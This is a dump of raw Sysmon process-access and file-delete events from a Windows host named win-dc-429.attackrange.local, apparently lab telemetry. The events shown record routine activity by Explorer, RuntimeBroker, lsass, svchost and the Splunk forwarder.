09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8749|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ae6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 23542300x80000000000000001055780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.525{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=839D115E332776E25E751791C235BC9B,SHA256=6A16F66DC0B266C497B180F1B39680BEC1807A8E05FEAAA4C6EF4E465AF04C37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.509{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001055778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.509{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001055777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.415{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.415{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.384{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC100986174C59B14BCDEA73190D0617,SHA256=2CE3B06E91602E8366AF1AE25538ACB4C654074D1B1B9BE7AC5AE3DBC4221006,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.337{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.337{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 